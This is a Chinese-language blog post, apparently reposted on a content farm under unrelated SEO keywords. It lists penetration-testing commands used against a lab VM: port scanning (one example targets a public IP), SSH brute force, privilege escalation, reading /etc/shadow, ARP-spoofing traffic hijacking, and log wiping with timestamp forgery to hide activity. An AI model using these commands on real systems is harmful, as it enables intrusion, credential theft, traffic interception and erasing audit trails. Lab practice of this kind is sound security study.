当前位置: 首页> 游戏> 单机 > 深圳网络营销培训_吉林省头条新闻_seo简介_最权威的排行榜网站

深圳网络营销培训_吉林省头条新闻_seo简介_最权威的排行榜网站

时间:2025/7/12 0:04:39来源:https://blog.csdn.net/qq_63036514/article/details/146579872 浏览次数:0次
深圳网络营销培训_吉林省头条新闻_seo简介_最权威的排行榜网站

渗透测试常用命令速览:从扫描到提权再到流量劫持

在渗透测试中,命令行工具是我们的得力助手。本文总结了我最近在测试虚拟机靶机(IP: 192.168.73.129)时用到的主要命令,涵盖网络扫描、暴力破解、权限提升、数据修改和流量劫持等环节。每个命令都附带介绍和使用场景,帮助你在类似场景中快速上手。
请添加图片描述

网络扫描与信息收集

  • nmap -sV -p 端口 IP
    介绍:Nmap 是强大的网络扫描工具,-sV 探测服务版本,-p 指定端口。
    用途:识别目标开放端口和服务版本,为后续攻击提供依据。
    示例:nmap -sV -p 22,25,80,110,443,3306,8080 101.43.26.14
    输出显示目标运行 OpenSSH 9.6p1 和 MySQL 8.0.39。

  • nmap -p- IP
    介绍:扫描目标所有 65535 个 TCP 端口。
    用途:全面探测开放端口,避免遗漏非标准服务。
    示例:nmap -p- 192.168.73.129
    发现 22 和 8080 端口开放。

  • nmap -sn 网段
    介绍:执行 ping 扫描,探测活跃主机。
    用途:发现内网中的其他目标。
    示例:nmap -sn 192.168.73.0/24

  • arp -a
    介绍:显示 ARP 缓存,列出局域网内的 IP 和 MAC 地址。
    用途:了解网络拓扑,定位潜在目标。
    示例:arp -a
    发现网关 192.168.73.2 和主机 192.168.73.130

暴力破解

  • hydra -L 用户文件 -P 密码文件 服务://IP
    介绍:Hydra 是一个密码破解工具,支持多种协议(如 SSH、MySQL)。
    用途:尝试弱密码登录目标服务。
    示例:hydra -L users.txt -P passwords.txt ssh://192.168.73.129
    成功找到 yohomi:123456

系统访问与提权

  • ssh 用户@IP
    介绍:通过 SSH 远程登录目标。
    用途:使用已知凭据进入系统。
    示例:ssh yohomi@192.168.73.129

  • id
    介绍:显示当前用户的 UID、GID 和组信息。
    用途:确认登录后的权限。
    示例:id
    输出:uid=0(root) gid=0(root)

  • sudo -l
    介绍:列出当前用户可执行的 sudo 命令。
    用途:检查是否能提权。
    示例:sudo -l
    输出显示 root 可运行所有命令。

  • sudo su
    介绍:以 root 身份启动 shell。
    用途:从普通用户提权至 root。
    示例:sudo su

  • find / -perm -u=s -type f 2>/dev/null
    介绍:查找具有 SUID 权限的可执行文件。
    用途:寻找潜在的提权点。
    示例:find / -perm -u=s -type f 2>/dev/null

数据收集

  • cat /etc/passwdcat /etc/shadow
    介绍:查看用户列表和密码哈希。
    用途:提取凭据进行离线破解。
    示例:cat /etc/shadow

  • find / -name "*关键字*" 2>/dev/null
    介绍:搜索指定文件名的文件,忽略权限错误。
    用途:定位敏感文件或项目文件。
    示例:find / -name "*.php" -o -name "*.html" 2>/dev/null
    找到 /home/yohomi/Desktop/Simple_forum/templates/

  • netstat -tuln
    介绍:列出监听的网络端口。
    用途:发现运行的服务。
    示例:netstat -tuln
    显示 8080 端口监听。

修改网页数据

  • nano 文件路径
    介绍:编辑文本文件。
    用途:直接修改网页模板或配置文件。
    示例:nano /home/yohomi/Desktop/Simple_forum/templates/admin/dashboard.html

  • curl http://IP:端口
    介绍:发送 HTTP 请求并查看响应。
    用途:验证网页修改效果。
    示例:curl http://192.168.73.129:8080

  • sqlite3 数据库文件
    介绍:访问 SQLite 数据库。
    用途:修改动态网页的数据。
    示例:sqlite3 database.db
    命令:UPDATE posts SET content = 'Modified by Grok' WHERE id = 1;

流量劫持

  • arpspoof -i 接口 -t 目标IP 网关IP
    介绍:执行 ARP 欺骗,伪装成目标或网关。
    用途:拦截局域网流量。
    示例:arpspoof -i ens33 -t 192.168.73.130 192.168.73.129

  • echo 1 > /proc/sys/net/ipv4/ip_forward
    介绍:启用 IP 转发。
    用途:支持流量透传。
    示例:echo 1 > /proc/sys/net/ipv4/ip_forward

  • mitmproxy -p 端口 --mode transparent
    介绍:启动透明代理,拦截和修改流量。
    用途:实时篡改 HTTP 响应。
    示例:mitmproxy -p 8080 --mode transparent -s modify.py

  • iptables -t nat -A PREROUTING -i 接口 -p tcp --dport 端口 -j REDIRECT --to-ports 新端口
    介绍:配置 NAT 规则,重定向流量。
    用途:将目标流量导向代理。
    示例:iptables -t nat -A PREROUTING -i ens33 -p tcp --dport 8080 -j REDIRECT --to-ports 8080

痕迹清理

  • echo "" > /var/log/日志文件
    介绍:清空指定日志文件。
    用途:删除登录或操作记录。
    示例:echo "" > /var/log/auth.log

  • history -c
    介绍:清除当前会话的命令历史。
    用途:防止命令记录被查看。
    示例:history -c

  • truncate -s 0 /var/log/lastlog
    介绍:将文件大小截断为 0。
    用途:清除历史登录记录。
    示例:truncate -s 0 /var/log/lastlog

  • date -s "时间"
    介绍:修改系统时间。
    用途:伪造操作时间戳。
    示例:date -s "2025-03-27 00:00:00"

关键字:深圳网络营销培训_吉林省头条新闻_seo简介_最权威的排行榜网站

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: